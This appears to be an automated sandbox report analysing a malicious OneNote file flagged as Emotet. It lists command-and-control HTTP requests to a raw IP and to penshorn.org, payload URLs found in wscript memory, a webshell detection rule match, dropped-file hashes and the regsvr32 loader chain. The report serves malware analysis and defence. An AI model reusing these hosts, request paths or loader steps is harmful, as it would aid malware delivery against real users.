Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
Source: wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFII
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/RPROFIN
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM

Source: unknown

HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: unknown

DNS traffic detected: queries for: penshorn.org

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\CRCPqQPgWxqcgJu\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180006818	3_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000B878	3_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180007110	3_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180008D28	3_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180014555	3_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_006F0000	3_2_006F0000
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073CC14	3_2_0073CC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074A000	3_2_0074A000
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074709C	3_2_0074709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00737D6C	3_2_00737D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073263C	3_2_0073263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00738BC8	3_2_00738BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00748FC8	3_2_00748FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00746C70	3_2_00746C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073D474	3_2_0073D474
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00732C78	3_2_00732C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073C078	3_2_0073C078
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073B07C	3_2_0073B07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074B460	3_2_0074B460
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00755450	3_2_00755450
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074C058	3_2_0074C058
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00737840	3_2_00737840
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074C44C	3_2_0074C44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00741030	3_2_00741030
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074EC30	3_2_0074EC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073B83C	3_2_0073B83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0075181C	3_2_0075181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00731000	3_2_00731000
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00739408	3_2_00739408
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00737C08	3_2_00737C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00733CF4	3_2_00733CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007390F8	3_2_007390F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007348FC	3_2_007348FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007420E0	3_2_007420E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00743CD4	3_2_00743CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007314D4	3_2_007314D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007318DC	3_2_007318DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00745CC4	3_2_00745CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073F8C4	3_2_0073F8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007408CC	3_2_007408CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007380CC	3_2_007380CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074A8B0	3_2_0074A8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007594BC	3_2_007594BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073DCB8	3_2_0073DCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007398AC	3_2_007398AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073AC94	3_2_0073AC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074CC84	3_2_0074CC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00745880	3_2_00745880
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00734C84	3_2_00734C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00737530	3_2_00737530
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074B130	3_2_0074B130
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00736138	3_2_00736138
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00741924	3_2_00741924
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00744D20	3_2_00744D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074AD28	3_2_0074AD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00759910	3_2_00759910
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747518	3_2_00747518
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00758500	3_2_00758500
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074610C	3_2_0074610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074D5F0	3_2_0074D5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007415C8	3_2_007415C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007395BC	3_2_007395BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074BDA0	3_2_0074BDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00740A70	3_2_00740A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00733274	3_2_00733274
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073A660	3_2_0073A660
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073B258	3_2_0073B258
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073F65C	3_2_0073F65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074A244	3_2_0074A244
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00748A2C	3_2_00748A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00740E2C	3_2_00740E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074662C	3_2_0074662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073BA2C	3_2_0073BA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00734214	3_2_00734214
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073461C	3_2_0073461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00745A00	3_2_00745A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00758A00	3_2_00758A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074020C	3_2_0074020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00748E08	3_2_00748E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00733E0C	3_2_00733E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007392F0	3_2_007392F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007496D4	3_2_007496D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074EAC0	3_2_0074EAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073D6CC	3_2_0073D6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074A6BC	3_2_0074A6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073AAB8	3_2_0073AAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00734EB8	3_2_00734EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00733ABC	3_2_00733ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073BE90	3_2_0073BE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00744A90	3_2_00744A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00754E8C	3_2_00754E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00738A8C	3_2_00738A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074D770	3_2_0074D770
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074CF70	3_2_0074CF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00738378	3_2_00738378
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073F77C	3_2_0073F77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074E750	3_2_0074E750
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00734758	3_2_00734758
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073975C	3_2_0073975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073D33C	3_2_0073D33C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00743B14	3_2_00743B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074E310	3_2_0074E310
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073EF14	3_2_0073EF14
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00744F18	3_2_00744F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073A7F0	3_2_0073A7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007527EC	3_2_007527EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00743FD0	3_2_00743FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00732FD4	3_2_00732FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007333D4	3_2_007333D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007497CC	3_2_007497CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00738FB0	3_2_00738FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073FFB8	3_2_0073FFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00748BB8	3_2_00748BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073DBA0	3_2_0073DBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00731B94	3_2_00731B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00745384	3_2_00745384
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_02460000	4_2_02460000
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A6E42	4_2_024A6E42
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C0618	4_2_024C0618
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B76A8	4_2_024B76A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A9B79	4_2_024A9B79
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A8BC8	4_2_024A8BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B8FC8	4_2_024B8FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B3FD0	4_2_024B3FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A63F4	4_2_024A63F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C73A4	4_2_024C73A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A640A	4_2_024A640A
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024ACC14	4_2_024ACC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B08CC	4_2_024B08CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A7D6C	4_2_024A7D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C6E48	4_2_024C6E48
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BA244	4_2_024BA244
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AB258	4_2_024AB258
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AF65C	4_2_024AF65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AA660	4_2_024AA660
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B0A70	4_2_024B0A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A3274	4_2_024A3274
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B8E08	4_2_024B8E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A3E0C	4_2_024A3E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B020C	4_2_024B020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B5A00	4_2_024B5A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C8A00	4_2_024C8A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A461C	4_2_024A461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A4214	4_2_024A4214
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024ABA2C	4_2_024ABA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B8A2C	4_2_024B8A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B0E2C	4_2_024B0E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B662C	4_2_024B662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A263C	4_2_024A263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AD6CC	4_2_024AD6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BEAC0	4_2_024BEAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B96D4	4_2_024B96D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C36FC	4_2_024C36FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A92F0	4_2_024A92F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C4E8C	4_2_024C4E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A8A8C	4_2_024A8A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C2E84	4_2_024C2E84
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024ABE90	4_2_024ABE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B4A90	4_2_024B4A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AAAB8	4_2_024AAAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A4EB8	4_2_024A4EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A3ABC	4_2_024A3ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BA6BC	4_2_024BA6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C2AB0	4_2_024C2AB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A4758	4_2_024A4758
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A975C	4_2_024A975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BE750	4_2_024BE750
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C8B68	4_2_024C8B68
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A8378	4_2_024A8378
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AF77C	4_2_024AF77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BD770	4_2_024BD770
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BCF70	4_2_024BCF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C5B1C	4_2_024C5B1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B4F18	4_2_024B4F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BE310	4_2_024BE310
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C8310	4_2_024C8310
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AEF14	4_2_024AEF14
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B3B14	4_2_024B3B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AD33C	4_2_024AD33C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B97CC	4_2_024B97CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A2FD4	4_2_024A2FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A33D4	4_2_024A33D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C27EC	4_2_024C27EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BFFFC	4_2_024BFFFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AA7F0	4_2_024AA7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B5384	4_2_024B5384
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A1B94	4_2_024A1B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C47A8	4_2_024C47A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024ADBA0	4_2_024ADBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AFFB8	4_2_024AFFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B8BB8	4_2_024B8BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A8FB0	4_2_024A8FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BC44C	4_2_024BC44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A7840	4_2_024A7840
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BC058	4_2_024BC058
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C5450	4_2_024C5450
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C5868	4_2_024C5868
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BB460	4_2_024BB460
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A2C78	4_2_024A2C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AC078	4_2_024AC078
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AB07C	4_2_024AB07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B6C70	4_2_024B6C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AD474	4_2_024AD474
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A9408	4_2_024A9408
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A7C08	4_2_024A7C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A1000	4_2_024A1000
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BA000	4_2_024BA000
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C181C	4_2_024C181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A7410	4_2_024A7410
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AB83C	4_2_024AB83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B1030	4_2_024B1030
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BEC30	4_2_024BEC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A80CC	4_2_024A80CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AF8C4	4_2_024AF8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B5CC4	4_2_024B5CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A18DC	4_2_024A18DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C1CD4	4_2_024C1CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A14D4	4_2_024A14D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B3CD4	4_2_024B3CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B20E0	4_2_024B20E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A90F8	4_2_024A90F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A48FC	4_2_024A48FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A3CF4	4_2_024A3CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C488C	4_2_024C488C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B5880	4_2_024B5880
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A4C84	4_2_024A4C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BCC84	4_2_024BCC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B709C	4_2_024B709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C1494	4_2_024C1494
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024AAC94	4_2_024AAC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C44A8	4_2_024C44A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A98AC	4_2_024A98AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C94BC	4_2_024C94BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024ADCB8	4_2_024ADCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BA8B0	4_2_024BA8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C4D64	4_2_024C4D64
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B610C	4_2_024B610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C8500	4_2_024C8500
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C2100	4_2_024C2100
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B7518	4_2_024B7518
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C9910	4_2_024C9910
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BAD28	4_2_024BAD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B4D20	4_2_024B4D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B1924	4_2_024B1924
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A6138	4_2_024A6138
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BB130	4_2_024BB130
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024B15C8	4_2_024B15C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BD5F0	4_2_024BD5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BBDA0	4_2_024BBDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A95BC	4_2_024A95BC

Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,	3_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,	3_2_0000000180010AC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,	3_2_0000000180010DB0

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253

Source: Insight_Medical_Publishing.one	ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one	Virustotal: Detection: 40%

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing.one
